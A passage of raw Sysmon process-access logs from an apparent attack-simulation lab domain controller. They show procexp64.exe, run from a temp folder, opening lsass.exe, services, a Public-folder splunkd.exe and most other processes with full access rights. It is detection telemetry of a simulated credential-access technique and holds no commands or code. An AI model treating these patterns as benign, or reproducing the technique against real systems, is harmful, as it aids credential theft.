Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 